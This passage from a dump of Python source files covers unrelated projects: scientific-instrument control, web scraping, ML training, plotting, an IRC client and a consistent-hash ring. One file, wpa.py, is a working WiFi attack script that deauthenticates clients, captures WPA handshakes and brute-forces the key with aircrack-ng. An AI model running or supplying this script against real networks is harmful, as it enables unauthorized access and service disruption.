% self.job\n\n def set_job_done(self):\n with self.lock:\n self.job = None\n\n #Init smurf task\n def init_hardware(self, session, params=None):\n\n self.base = pr.Root(name='AMCc', description='')\n\n self.base.add(FpgaTopLevel(\n simGui = self.args[\"simGui\"],\n commType = self.args['commType'],\n ipAddr = self.args['ipAddr'],\n pcieRssiLink = (int(self.args['slot']) - 2)\n ))\n\n streamDataWriter = pr.utilities.fileio.StreamWriter(name=\"streamDataWriter\")\n self.base.add(streamDataWriter)\n\n pr.streamConnect(self.base.FpgaTopLevel.stream.application(0xC1), self.base.streamDataWriter.getChannel(0))\n\n self.base.start(pollEn = self.args['pollEn'])\n\n return True, \"Hardware Initialized\"\n\n #Load config file\n def read_config(self, session, params={}):\n \"\"\"\n Loads configuration file\n\n params:\n - filename: path to the config file\n \"\"\"\n filename = params.get(\"filename\")\n\n if filename is None:\n print(\"filename must be specified in params. File not loaded.\")\n return False, \"Correct params not specified\"\n\n self.base.ReadConfig(filename)\n\n return True, \"Loaded config file {}\".format(filename)\n\n def node_from_path(self, path):\n \"\"\"\n Returns a pyrogue node from a given path.\n\n params:\n - path: A list containing the sequence of node names\n \"\"\"\n cur_node = self.base\n for node in path:\n next_node = cur_node.nodes.get(node)\n if next_node is None:\n raise ValueError(\"{} has no child {}\".format(cur_node.name, node))\n cur_node = next_node\n\n return cur_node\n\n\n def set_variable(self, session, params={}):\n \"\"\"\n Sets variable\n params:\n - path: Path to the variable in the form of a list of node names\n - value: value to set\n - write: write \n \"\"\"\n print(params)\n path = params.get('path')\n value = params.get('value')\n write = params.get('write', True)\n\n if path is None or value is None:\n raise ValueError(\"Must specify path and value in params\")\n\n variable = self.node_from_path(path)\n variable.set(value, write=write)\n\n return True, \"Varibale {} set to {}\".format(variable.name, value)\n\n def add_listener(self, session, params={}):\n \"\"\"\n Adds listener to a variable\n params:\n - path: Path to the variable in the form of a list of node names\n - callback: Function to be called when variable is updated\n Callback must have the form: f(var, value, disp)\n \"\"\"\n path = params.get('path')\n # callback = params.get('callback')\n def callback(var, value, disp):\n print(\"Variable {} has been updated to {}\".format(var, disp))\n\n if path is None or callback is None:\n raise ValueError(\"Must specify path and callback in params\")\n\n variable = self.node_from_path(path)\n variable.addListener(callback)\n\n return True, \"Added listener to {}\".format(variable.name)\n\n\nif __name__ == '__main__':\n agent, runner = ocs_agent.init_ocs_agent('observatory.smurf')\n\n smurf = Smurf_Agent(agent)\n \n agent.register_task('init_hardware', smurf.init_hardware)\n agent.register_task('read_config', smurf.read_config)\n agent.register_task('set_variable', smurf.set_variable)\n agent.register_task('add_listener', smurf.add_listener)\n\n runner.run(agent, auto_reconnect=True)\n smurf.close()\n","sub_path":"agents/smurf/Smurf_Agent.py","file_name":"Smurf_Agent.py","file_ext":"py","file_size_in_byte":4631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"256928925","text":"from selenium import webdriver\nfrom selenium.webdriver import Chrome, ChromeOptions\nimport time \nimport pandas 
as pd\nfrom datetime import datetime\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport threading\n\n\ndef find_table_target_word(th_elms,td_elms,target:str):\n for th_elm,td_elm in zip(th_elms,td_elms):\n if th_elm.text == target:\n return td_elm.text\n\n\n\ndef calc_total_pages_num(search_keyword):\n\n url = 'https://tenshoku.mynavi.jp/'\n\n driver = Chrome(ChromeDriverManager().install())\n driver.get(url)\n time.sleep(2)\n\n try:\n driver.execute_script('document.querySelector(\".karte-close\").click()')\n time.sleep(5)\n driver.execute_script('document.querySelector(\".karte-close\").click()')\n time.sleep(3)\n except:\n pass\n\n driver.find_element_by_class_name('topSearch__text').send_keys(search_keyword)\n driver.find_element_by_class_name('topSearch__button').click()\n\n num = int(driver.find_element_by_css_selector('body > div.wrapper > div:nth-child(5) > div.result > div > p.result__num > em').text)\n driver.quit()\n return -(-num//50)\n\n\n\ndef search(search_keyword,i):\n\n page_url = f'https://tenshoku.mynavi.jp/list/kw{search_keyword}/pg{i}/?jobsearchType=14&searchType=18'\n\n driver = Chrome(ChromeDriverManager().install())\n driver.get(page_url)\n time.sleep(2)\n\n try:\n driver.execute_script('document.querySelector(\".karte-close\").click()')\n time.sleep(5)\n driver.execute_script('document.querySelector(\".karte-close\").click()')\n time.sleep(3)\n except:\n pass\n\n exp_name_list = []\n exp_copy_list = []\n exp_status_list = []\n exp_first_year_fee_list = []\n \n name_list = driver.find_elements_by_css_selector(\".cassetteRecruit__heading .cassetteRecruit__name\")\n copy_list = driver.find_elements_by_css_selector(\".cassetteRecruit__heading .cassetteRecruit__copy\")\n status_list = driver.find_elements_by_css_selector(\".cassetteRecruit__heading .labelEmploymentStatus\")\n table_list = driver.find_elements_by_css_selector(\".cassetteRecruit .tableCondition\") # get the whole conditions table\n\n for name,copy,status,table in zip(name_list,copy_list,status_list,table_list):\n exp_name_list.append(name.text)\n exp_copy_list.append(copy.text)\n exp_status_list.append(status.text)\n\n first_year_fee = find_table_target_word(table.find_elements_by_tag_name(\"th\"),table.find_elements_by_tag_name(\"td\"), \"初年度年収\")\n exp_first_year_fee_list.append(first_year_fee)\n \n driver.quit()\n\n EXP_CSV_PATH = 'exp_list_{search_keyword}_{datetime}.csv'\n\n now = datetime.now().strftime('%Y-%m-%d-%H-%M-%S')\n df = pd.DataFrame({\"企業名\":exp_name_list,\"キャッチコピー\":exp_copy_list,\"ステータス\":exp_status_list,\"初年度年収\":exp_first_year_fee_list})\n df.to_csv(EXP_CSV_PATH.format(search_keyword=search_keyword,datetime=now), encoding=\"utf-8-sig\")\n\n\n\n\nsearch_keyword = 'プログラマー'\n\ntotal_pages_num = calc_total_pages_num(search_keyword)\n\nt_list = []\nfor i in range(1,total_pages_num+1):\n t = threading.Thread(target=search, args=[search_keyword, i])\n t_list.append(t)\n\nfor t in t_list:\n t.start()\n \nfor t in t_list:\n t.join()","sub_path":"kadai8-submit3/kadai8-submit3.py","file_name":"kadai8-submit3.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} {"seq_id":"117680554","text":"import os, sys\nimport subprocess\nimport time\nimport pandas as pd\nimport commands\nimport signal\n\n\nclass Wpa():\n\t\"\"\"docstring for Wpa\"\"\"\n\tdef __init__(self,red):\n\t\tself._red = red\n\n\tdef red(self):\n\t\treturn self._red\n\t\n\tdef atacar(self):\n\t\twlan = commands.getoutput('sudo airmon-ng check 
kill')\n\t\tcomando = 'sudo airmon-ng start wlan1 '+self.red().channel()\n\t\twlan = commands.getoutput(comando)\n\t\tnom = self.red().bssid()\n\t\tnom = nom.replace(\" \",\"_\")\n\t\tarchivo = './datos/'+nom+'/'+nom\n\t\tprint('Empezando la busqueda de handshakes')\n\t\tcomando ='sudo airodump-ng --bssid '+str(self.red().essid())+' --channel '+str(self.red().channel())+' --write '+archivo+' wlan1mon'\n\t\tairodump = subprocess.Popen(comando,shell=True,preexec_fn=os.setsid)\n\t\ttime.sleep(2)\n\t\tprint('lanzando la desautenticacion')\n\t\tcomando = 'sudo aireplay-ng -0 15 -a '+self.red().essid()+' wlan1mon'\n\t\taireplay = subprocess.Popen([comando],stdout=subprocess.PIPE,stderr=subprocess.PIPE,shell=True,preexec_fn=os.setsid)\n\t\taireplay.wait()\n\t\tprint('Capturando handshake')\n\t\ttime.sleep(120)\n\t\tairodump.terminate()\n\t\tairodump.kill()\n\t\tos.killpg(os.getpgid(airodump.pid),signal.SIGTERM)\n\t\tcomando = 'sudo john --incremental:Digits --stdout | aircrack-ng -b '+self.red().essid()+' '+archivo+'-01.cap'+' -w - > '+archivo+'contrasena'\n\t\tprint(comando)\n\t\tprint('Descifrando la contrasena')\n\t\tresult = subprocess.Popen(comando,shell=True,preexec_fn=os.setsid)\n\t\ttime.sleep(60)\n\t\tresult.terminate()\n\t\tresult.kill()\n\t\tos.killpg(os.getpgid(result.pid),signal.SIGTERM)\n\t\tcomando = 'cat '+archivo+'contrasena |grep \"KEY FOUND\"'\n\t\tsalida = commands.getoutput(comando)\n\t\tsalida = str(salida)\n\t\tprint(salida)\n\t\tif salida != '':\n\t\t\tself.red().set_contrasena(salida)\n\t\telse:\n\t\t\tprint('Caduco el tiempo del ataque, la contrasena no pudo ser descifrada')\n\t\t\tself.red().set_contrasena('El tiempo del ataque ha caducado y no se pudo recuperar la contrasena')\t\n\t\tself.habilitarWlan()\n\n\n\tdef habilitarWlan(self):\n\t\twlan = commands.getoutput('sudo airmon-ng stop wlan1mon')\n\t\twlan = commands.getoutput('sudo ifconfig wlan1 up')","sub_path":"logica/wpa.py","file_name":"wpa.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"352422710","text":"#!/usr/bin/env python3\nimport os\nimport subprocess\nimport sys\n\n\ndef test_i(i):\n filename = os.path.join(sys.argv[2], '%02d.txt' % i)\n result = subprocess.run([sys.argv[1], filename],\n stdout=subprocess.PIPE)\n expected_filename = os.path.join(sys.argv[2], '%02d-expected.txt' % i)\n with open(expected_filename, 'r') as expected_file:\n expected = expected_file.read()\n if expected != result.stdout.decode():\n print('FAIL: i = %02d' % i)\n print('expected:')\n print(expected)\n print('actual:')\n print(result.stdout.decode())\n sys.exit(1)\n\n\n# usage: ./e2e_test.py tbs_main ex_dir\ndef main():\n test_i(1)\n i = 2\n while os.path.isfile(os.path.join(sys.argv[2], '%02d.txt' % i)):\n test_i(i)\n i += 1\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"ex/e2e_test.py","file_name":"e2e_test.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"436307803","text":"import numpy\r\n\r\ndef normalize_v3(arr):\r\n ''' Normalize a numpy array of 3 component vectors shape=(n,3) '''\r\n lens = numpy.sqrt( arr[:,0]**2 + arr[:,1]**2 + arr[:,2]**2 )\r\n arr[:,0] /= lens\r\n arr[:,1] /= lens\r\n arr[:,2] /= lens\r\n return arr\r\n\r\n\r\ndef Get_Normal(vertices,faces):\r\n N = []\r\n for face in range(len(faces)):\r\n c_face = faces[face]\r\n v_1 = int(c_face[0,0]) - 1\r\n v_2 = int(c_face[0,1]) - 1\r\n v_3 = 
int(c_face[0,2]) - 1\r\n        v_1 = vertices[v_1]\r\n        v_2 = vertices[v_2]\r\n        v_3 = vertices[v_3]\r\n        n = numpy.cross(v_1-v_3 , v_2-v_3 )\r\n        # normalize_v3 expects an array of shape (n,3), so wrap the single face normal\r\n        n = normalize_v3(n.reshape(1, 3))[0]\r\n        N.append(n)\r\n    return N\r\n","sub_path":"src/normals.py","file_name":"normals.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} {"seq_id":"611642860","text":"# -*- coding: utf-8 -*-\nfrom __future__ import division\nimport os\nimport math\nimport re\nimport gzip\nimport glob\nimport os.path\nimport shutil\nimport fnmatch\nimport zipfile\nfrom os import walk\n\n\n# Check whether the trace date belongs to the desired interval\ndef EncontraData(dataNova, dicionarioData):\n for data in dicionarioData:\n if (data == dataNova):\n return True\n return False\n\n# Define the dictionary of mobile and non-mobile devices\ndef defineDicionarios(dicionarioMobile):\n ArquivoMobile = open('Mobile.txt', 'r');\n for linha in ArquivoMobile:\n dicionarioMobile.append(linha.strip())\n return dicionarioMobile\n\n# Write the matrix to a file\ndef EscreveArquivo(registros,numArquivo):\n for registro in registros:\n try:\n with open(\"Impeachment_\"+str(numArquivo)+\".txt\", \"a\") as arquivo:\n arquivo.write(str(registro)+\"\\n\")\n except: \n EscreveLogErro(\"Erro escrita em disco\")\n\n# Write the log to a file\ndef EscreveLog(mensagem):\n try:\n with open(\"Log.txt\", \"a\") as arquivo:\n arquivo.write(str(mensagem)+\"\\n\")\n except: \n EscreveLogErro(\"Erro no log\")\n\n# Write the error log to a file\ndef EscreveLogErro(mensagem):\n try:\n with open(\"LogErro.txt\", \"a\") as arquivo:\n arquivo.write(str(mensagem)+\"\\n\")\n except: \n print(\"Erro no log de erro\")\n\n\n# Check whether a term belongs to the Mobile dictionary\ndef EncontraMobile(linha,dicionarioMobile):\n achou = False\n try:\n for termo in dicionarioMobile:\n if (linha.find(termo) != -1):\n achou = True\n break\n except: \n EscreveLogErro(\"Erro na busca\")\n return achou\n\n# Find every file with the .gz extension in the source directory and decompress it into the destination folder\ndef VarreDiretorio(caminho,dicionarioMobile, dicionarioData):\n numArquivo = 1\n for conteudo in glob.glob(os.path.join(caminho, '*')):\n if os.path.isdir(conteudo):\n contadores = VarreDiretorio(conteudo, dicionarioMobile, dicionarioData)\n if fnmatch.fnmatch(conteudo, '*.gz'):\n # Clean up the file name\n dataArquivo = conteudo.replace(\"nginx-fe_access-\",\"\")\n dataArquivo = dataArquivo.replace(\"nginx-fe_monitor-\",\"\")\n dataArquivo = dataArquivo.replace(\"nginx-fe_crypto_access-\",\"\")\n dataArquivo = dataArquivo.replace(caminho,\"\")\n dataArquivo = dataArquivo.replace(\"/\",\"\")\n dataArquivo = dataArquivo[:8]\n # Check whether the date is inside the defined interval\n achou = EncontraData(dataArquivo, dicionarioData)\n if(achou == True):\n registros = []\n EscreveLog(\"Inicio da leitura do arquivo \"+str(conteudo))\n base = os.path.basename(conteudo) \n with gzip.open(conteudo, 'rb') as infile:\n # For each line of the input file\n for linha in infile:\n try:\n # Turn the line into a vector\n vetorLinha = linha.split()\n # Drop all the columns before the 20th\n linhaLimpa = ' '.join(vetorLinha[20::])\n # Search the line for terms from the Mobile dictionary\n mobile = EncontraMobile(linhaLimpa,dicionarioMobile)\n if(mobile):\n # append SESSION_6 USER_0 REQUEST_TIME_9 TIME_STAMP_2 BODY_BYTES_11\n registros.append(str(vetorLinha[6]) + \" \" + str(vetorLinha[0]) + \" \" + str(vetorLinha[9]) + \" \" + str(vetorLinha[2]) + \" \" + str(vetorLinha[11]))\n except: \n EscreveLogErro(\"Erro leitura vetor linha\")\n # After each file, save the records to disk\n EscreveArquivo(registros, numArquivo)\n numArquivo = numArquivo +1\n EscreveLog(\"Fim da leitura do arquivo \"+str(conteudo)) \n\nclass Principal():\n EscreveLog(\"Inicío script\")\n dicionarioMobile = []\n dicionarioData = []\n dicionarioData.append(\"20160522\")\n\n # Load the dictionaries into memory\n dicionarioMobile = defineDicionarios(dicionarioMobile)\n\n # Directory with the compressed files\n caminhoOrigem = \"/media/servertrace/live/live\"\n #caminhoOrigem = \"/home/daniel/workplace/TracesCDN/Origem\"\n \n # Locate the traces\n VarreDiretorio(caminhoOrigem,dicionarioMobile, dicionarioData)\n\n # Finish the log\n EscreveLog(\"Fim do script\")\n \n \n\n\n","sub_path":"ScriptsArtigo01/Impeachment_2_senado.py","file_name":"Impeachment_2_senado.py","file_ext":"py","file_size_in_byte":4633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} {"seq_id":"400500862","text":"from tensorflow.examples.tutorials.mnist import input_data\nimport tensorflow as tf\n\nmnist = input_data.read_data_sets('MNIST_data/',one_hot=True)\n# define the network\nin_units = 784\nh1_units = 300\nW1 = tf.Variable(tf.truncated_normal([in_units,h1_units],stddev=0.1)) # standard deviation is 0.1\nb1 = tf.Variable(tf.zeros([1,h1_units]))\nW2 = tf.Variable(tf.zeros([h1_units,10]))\nb2 = tf.Variable(tf.zeros([1,10]))\n\nx = tf.placeholder(tf.float32,[None,in_units])\nkeep_prob = tf.placeholder(tf.float32)\nhidden1 = tf.nn.relu(tf.matmul(x,W1)+b1)\nhidden1_drop = tf.nn.dropout(hidden1,keep_prob)\ny = tf.nn.softmax(tf.matmul(hidden1_drop,W2)+b2)\n# define the loss function and the optimizer\ny_ = tf.placeholder(tf.float32,[None,10])\ncost = -tf.reduce_sum(y_*tf.log(y),reduction_indices=[1])\ncross_entropy = tf.reduce_mean(cost)\ntrain = tf.train.AdagradOptimizer(0.3).minimize(cross_entropy)\n# training\nsession = tf.Session()\ninit = tf.global_variables_initializer()\nsession.run(init)\nfor i in range(3000):\n batch_x,batch_y = mnist.train.next_batch(100)\n session.run(train,feed_dict={x:batch_x,y_:batch_y,keep_prob:0.75})\n# evaluate the trained model\nprediction = tf.equal(tf.argmax(y,1),tf.argmax(y_,1)) # shape None*1\naccuracy = tf.reduce_mean(tf.cast(prediction,tf.float32))\nprint(session.run(accuracy,feed_dict={x:mnist.test.images,y_:mnist.test.labels,keep_prob:1.0}))\n\n\n\n","sub_path":"MLP.py","file_name":"MLP.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} {"seq_id":"620316387","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport sklearn as skl\nimport numpy as np\nimport seaborn as sns\nimport folium\ndef heartbar():\n    path = \"heart.csv\"\n    df = pd.read_csv(path)\n    df = df.drop(columns=['Class', 'Topic', 'DataSource', 'Data_Value_Footnote_Symbol', 'Data_Value_Footnote', 'StratificationCategory1'])\n    df = df.drop(columns=['Data_Value_Type', 'StratificationCategory2', 'TopicID', 'Georeference Column', 'Data_Value_Unit'])\n    df = df.drop(columns=['LocationID', 'LocationDesc', 'States', 'Counties'])\n    df.rename(columns={\"Stratification1\": \"Gender\", \"Stratification2\": \"Race\", \"Y_lat\": \"Y\", \"X_lon\": \"X\"}, inplace=True)\n    print(df.head())\n    df.sort_values(by = ['Data_Value'], ascending=False, axis=0, inplace=True)\n    df_top25 = df.iloc[0:275,:]\n    print(df_top25.head())\n    plt.style.use('seaborn-pastel')\n    plt.figure(figsize=(20, 3))\n    plt.bar(df_top25['LocationAbbr'],df_top25['Data_Value'], color = 'red', width = 0.5)\n    plt.title('Heart Disease Trends In Top 25 States')\n    plt.ylabel('Heart Attacks per 100,000')\n    plt.xlabel('State')\n    plt.show()\nheartbar()","sub_path":"BarPlot.py","file_name":"BarPlot.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} {"seq_id":"481215963","text":"\"\"\"Test py_modules\"\"\"\n\n\nimport log\nimport task\nimport worker\n\n\ndef test_repo():\n    \"\"\"test\"\"\"\n    bill = worker.Worker('Bill')\n    john = worker.Worker('John')\n    log_file = log.Log()\n    fixed_task = task.Task('fixed')\n    hourly_task = task.Task('hourly', time=2)\n    log_file.confirm(bill, fixed_task)\n    log_file.confirm(john, hourly_task)\n    assert log_file.report() == \"\"\"Bill\\t$20\nJohn\\t$30\"\"\"\n","sub_path":"test_modules.py","file_name":"test_modules.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} {"seq_id":"169510884","text":"'''\r\n[Program 12] Problem: count how many prime numbers there are between 101 and 200, and print all of them.\r\n1. Program analysis: to test whether a number is prime, divide it by each integer from 2 up to sqrt(the number); if any division is exact, the number is not prime, otherwise it is prime.\r\n2. Program source code:\r\n'''\r\nimport math\r\ndef isprimy(a):\r\n    d=[]\r\n    for b in a:\r\n        for c in range(2,int(math.sqrt(b))+1):\r\n            if b % c == 0:\r\n                d.append(b)\r\n                break\r\n    return d\r\nb = []\r\nfor a in range(101,201):\r\n    b.append(a)\r\nfor a in isprimy(b):\r\n    b.remove(a)\r\nprint(b)\r\n","sub_path":"Test1/test12.py","file_name":"test12.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} {"seq_id":"126809179","text":"import turtle\nt = turtle.Turtle()\nscreen = turtle.Screen()\nscreen.bgcolor(\"lightyellow\")\nt.hideturtle()\nt.shape(\"turtle\")\nt.penup()\nt.goto(0,0)\nsteps = 20\n'''\n#Draws a circular spiral\nfor i in range(300):\n    t.stamp()\n    step = steps + 2\n    t.penup()\n    t.forward(steps)\n    t.right(24)\n'''\n\n#draws a square spiral\nt.pendown()\nt.speed(0)\nfor i in range(1300):\n    side = i% 4\n    if side == 0:\n        t.pencolor(\"red\")\n    if side == 1:\n        t.pencolor(\"green\")\n    if side == 2:\n        t.pencolor(\"yellow\")\n    if side == 3:\n        t.pencolor(\"blue\")\n    t.fd(i)\n    t.lt(90.5)\n","sub_path":"Python - Beginner/lesson 9 - youwen.py","file_name":"lesson 9 - youwen.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} {"seq_id":"20160865","text":"# NAMES retrieving irc client, thanks to smackshow\n# from here - http://stackoverflow.com/questions/6671620/list-users-in-irc-channel-using-twisted-python-irc-framework\nfrom twisted.words.protocols import irc\nfrom twisted.internet import defer\n\n\nclass NamesIRCClient(irc.IRCClient):\n    def __init__(self, *args, **kwargs):\n        self._namescallback = {}\n\n    def names(self, channel):\n        channel = channel.lower()\n        d = defer.Deferred()\n        if channel not in self._namescallback:\n            self._namescallback[channel] = ([], [])\n\n        self._namescallback[channel][0].append(d)\n        self.sendLine(\"NAMES %s\" % channel)\n        return d\n\n    def irc_RPL_NAMREPLY(self, prefix, params):\n        channel = params[2].lower()\n        nicklist = params[3].split(' ')\n\n        if channel not in self._namescallback:\n            return\n\n        n = self._namescallback[channel][1]\n        n += nicklist\n\n    def irc_RPL_ENDOFNAMES(self, prefix, params):\n        channel = params[1].lower()\n        if channel not in self._namescallback:\n            return\n\n        callbacks, namelist = self._namescallback[channel]\n\n        for cb in callbacks:\n            cb.callback(namelist)\n\n        del 
self._namescallback[channel]\n","sub_path":"names_bot.py","file_name":"names_bot.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"381080392","text":"import os\nimport sys\nimport json\nimport math\nimport threading\nfrom collections import defaultdict\nimport pandas as pd\n\nfrom unionFind import UnionFind\n\n\nTHRESHOLD = 0.6\nif len(sys.argv) > 1:\n THRESHOLD = float(sys.argv[1])\n\n\ndef date_intersect(start_a, end_a, start_b, end_b):\n if start_a > end_b or start_b > end_a:\n return None\n return sorted([start_a, end_a, start_b, end_b])[1:3]\n\n\n# Multi-thread speed up.\nclass MyThread(threading.Thread):\n threads = []\n lock = threading.Lock()\n sem = threading.Semaphore(200)\n user_cmt_data = None\n user_lst_data = None\n uf = None\n\n def __init__(self, cur_idx):\n threading.Thread.__init__(self)\n self.idx = cur_idx\n\n @staticmethod\n def run_tasks():\n for thread in MyThread.threads:\n MyThread.sem.acquire()\n thread.start()\n\n for thread in MyThread.threads:\n thread.join()\n\n @classmethod\n def set_uf(cls, uf):\n cls.uf = uf\n\n @classmethod\n def set_lst_data(cls, lst_data):\n cls.user_lst_data = lst_data\n\n @classmethod\n def set_cmt_data(cls, cmt_data):\n cls.user_cmt_data = cmt_data\n\n def run(self):\n cur_usr_a = MyThread.user_lst_data[self.idx]\n print(f\"Thread {self.idx} start.\")\n for j in range(self.idx + 1, len(MyThread.user_lst_data)):\n # print(f\"{j}\", end=\"\\t\")\n cur_usr_b = MyThread.user_lst_data[j]\n # Calculate similarity\n d_usr_a = MyThread.user_cmt_data[cur_usr_a]\n d_usr_b = MyThread.user_cmt_data[cur_usr_b]\n time_range = date_intersect(d_usr_a[\"s\"], d_usr_a[\"e\"], d_usr_b[\"s\"], d_usr_b[\"e\"])\n if not time_range:\n # pass this pair if there's no overlap between the dates\n continue\n duration = (time_range[1] - time_range[0]).days + 1\n accu = 0\n duration_none_empty = 0\n for k in range(duration):\n cur_date = time_range[0] + pd.Timedelta(k, unit=\"d\")\n cmt_pkgs_a = d_usr_a[\"data\"].get(cur_date, {})\n cmt_pkgs_b = d_usr_b[\"data\"].get(cur_date, {})\n # Calculate Jaccard's coefficient\n frac_a = 0\n frac_b = sum(cmt_pkgs_a.values()) + sum(cmt_pkgs_b.values())\n if not frac_b:\n continue\n for pkg in cmt_pkgs_a.keys():\n if pkg in cmt_pkgs_b.keys():\n frac_a += min(cmt_pkgs_a[pkg], cmt_pkgs_b[pkg])\n accu += frac_a / (frac_b - frac_a)\n duration_none_empty += 1\n similarity = accu / duration_none_empty\n if similarity > THRESHOLD:\n MyThread.lock.acquire()\n MyThread.uf.union(self.idx, j)\n MyThread.lock.release()\n print(f\"Thread {self.idx} finished.\")\n MyThread.sem.release()\n\n\nf = open(os.path.join(\"data\", \"test.dat\"), \"r\", encoding=\"utf-8\")\ndata = sorted([line[:-1].split(\"\\t\") for line in f], key=lambda x: x[3])\nf.close()\n\nprint(\"Initializing...\")\nuser_cmt_data = {}\nfor line in data:\n line[4] = pd.to_datetime(line[4])\n if line[3] not in user_cmt_data:\n user_cmt_data[line[3]] = {\n \"s\": None,\n \"e\": None,\n \"data\": {},\n \"cnt\": 0,\n }\n if not user_cmt_data[line[3]][\"s\"] or line[4] < user_cmt_data[line[3]][\"s\"]:\n user_cmt_data[line[3]][\"s\"] = line[4]\n if not user_cmt_data[line[3]][\"e\"] or line[4] > user_cmt_data[line[3]][\"e\"]:\n user_cmt_data[line[3]][\"e\"] = line[4]\n if line[4] not in user_cmt_data[line[3]][\"data\"]:\n user_cmt_data[line[3]][\"data\"][line[4]] = defaultdict(int)\n user_cmt_data[line[3]][\"data\"][line[4]][line[1]] += 1\n user_cmt_data[line[3]][\"cnt\"] += 
1\n\ndel_list = []\nfor k, v in user_cmt_data.items():\n if v[\"cnt\"] < 2:\n del_list.append(k)\nprint(f\"Delete {len(del_list)} user(s) from {len(user_cmt_data)} users.\")\nfor k in del_list:\n del user_cmt_data[k]\n\nuser_lst = sorted(list(user_cmt_data.keys()))\nuf = UnionFind(len(user_lst))\n\nMyThread.set_cmt_data(user_cmt_data)\nMyThread.set_lst_data(user_lst)\nMyThread.set_uf(uf)\n\nfor i in range(len(user_lst) - 1):\n MyThread.threads.append(MyThread(i))\n\nMyThread.run_tasks()\n\nresult = defaultdict(list)\nfor idx, res in enumerate(uf.result()):\n result[res].append(user_lst[idx])\n\n# print(\"Writing result.\")\nif not os.path.exists(\"res\"):\n os.mkdir(\"res\")\n \nf = open(os.path.join(\"res\", f\"usr_cred_weight_res_{THRESHOLD}.json\"), \"w\", encoding=\"utf-8\")\njson.dump({group: {\n \"Group weight\": math.sqrt(len(mem)),\n \"Mem weight\": math.sqrt(len(mem))/len(mem)\n} for group, mem in result.items()}, f, indent=2)\nf.close()\n\nf = open(os.path.join(\"res\", f\"usr_cred_grouping_res_{THRESHOLD}.json\"), \"w\", encoding=\"utf-8\")\njson.dump({group: mem for group, mem in result.items()}, f, indent=2, ensure_ascii=False)\nf.close()\n\n# print(\"Done.\")\n","sub_path":"edwin_2019/scripts/user_cred.py","file_name":"user_cred.py","file_ext":"py","file_size_in_byte":4973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"452768411","text":"from bisect import bisect\r\nimport hashlib\r\nimport bisect\r\n\r\n\r\nclass ConsistentHash(object):\r\n # Величина 1го деления на 1 сервер с весом 1\r\n interleave_count = 40\r\n\r\n def __init__(self, objects=None):\r\n \"\"\"\r\n Объекты это сервера наши, могут быть в формате:\r\n [\"server_1\", ..., \"server_n\"]\r\n Или как словарь с весами для каждого сервера:\r\n {'server_1': 1,\r\n 'server_2': 2,\r\n 'server_n': 1}\r\n \"\"\"\r\n\r\n # Список сортированный с числами (хеши от серверов) распложеным на кольце\r\n self.keys = []\r\n # Словарь где для значения из key есть соответствующее имя сервера\r\n self.key_node = {}\r\n\r\n # Список серверов в строках\r\n self.nodes = []\r\n # Словарь с весами\r\n self.weights = {}\r\n # Кол-во серверов\r\n self.index = 0\r\n # Проинициализируем кольцо\r\n self.add_nodes(objects)\r\n\r\n def _ingest_objects(self, objects):\r\n if isinstance(objects, dict):\r\n self.nodes.extend(objects.keys())\r\n self.weights.update(objects.copy())\r\n elif isinstance(objects, list):\r\n self.nodes.extend(objects[:])\r\n\r\n def add_nodes(self, nodes):\r\n \"\"\"\r\n Добавим ноды в кольцо.\r\n - Если нам п��реданны объекты значит там формат [\"name\", weight]\r\n - Если передан лист то там [\"name\"] и у всех вес 1\r\n \"\"\"\r\n self._ingest_objects(nodes)\r\n\r\n # Сгенерируем кольцо с текущими серверами\r\n self._generate_ring(start=self.index)\r\n\r\n self.index = self.get_nodes_cnt()\r\n self.keys.sort()\r\n\r\n def _generate_ring(self, start=0):\r\n # Расположем сервера на \"кольце\"\r\n for node in self.nodes[start:]:\r\n for key in self._node_keys(node):\r\n # Занесем в словарь для каждых 4байт из 16\r\n # пару [вычисленное 32 разрядное значение ; имя ноды].\r\n self.key_node[key] = node\r\n # Добавим в список \"отметку\"/\"позицию\" сервера на кольце\r\n self.keys.append(key)\r\n\r\n def _node_keys(self, node):\r\n \"\"\"\r\n node это строка с именем сервера\r\n Добавим веса ноде если они заданны, иначе 1.\r\n \"\"\"\r\n if node in self.weights:\r\n weight = self.weights.get(node)\r\n else:\r\n weight = 1\r\n\r\n factor = self.interleave_count * 
